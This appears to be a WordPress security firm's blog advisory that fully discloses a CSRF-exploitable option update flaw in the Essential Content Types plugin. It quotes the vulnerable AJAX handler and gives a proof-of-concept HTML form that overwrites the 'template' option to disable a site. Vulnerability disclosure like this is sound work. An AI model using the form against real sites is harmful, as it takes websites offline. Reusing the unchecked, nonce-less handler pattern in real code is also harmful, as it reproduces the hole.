13 Dec

Our Proactive Monitor Caught an Authenticated Option Update Vulnerability in Essential Content Types That Could Disable Websites

For not the first time this week our proactive monitoring of changes being made to WordPress plugins to try to catch serious vulnerabilities when they are introduced in to plugins has caught an authenticated option update vulnerability in a plugin, this time in the plugin Essential Content Types. Like the one we mentioned yesterday this one could be used to disable a website, either by someone logged in to WordPress or if an attacker can get someone logged in to WordPress to access a page they control.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.

Technical Details

The plugin registers the function dashboard_switch() to be accessible by anyone logged in to WordPress through its AJAX functionality:

$this->loader->add_action( 'wp_ajax_ect_dashboard_switch', $plugin_admin, 'dashboard_switch' );

That function, which is located in the file /admin/class-essential-content-types-admin.php, will update a WordPress option (setting) specified by the POST input “option_name” to a value modified by the POST input “value”:

function dashboard_switch() {
	$value = ( 'true' == $_POST['value'] ) ? 1 : 0;
	$option_name = $_POST['option_name'];
	$option_value = get_option( $option_name );
	$option_value['status'] = $value;
	if( update_option( $option_name, $option_value ) ) {

As we found when looking into another similar vulnerability, by replacing the “template” option with content like could be set with this you can disable the frontend and admin area of the website.

Since there is no check for a valid nonce, this could also be exploited through cross-site request forgery (CSRF).

Proof of Concept

The following proof of concept will break the website, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=ect_dashboard_switch" method="POST">
<input type="hidden" name="option_name" value="template" />
<input type="hidden" name="value" value="test" />
<input type="submit" value="Submit" />

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service you can suggest/vote for the plugins you use to receive a security review from us. You can start using the service for free when you sign up now.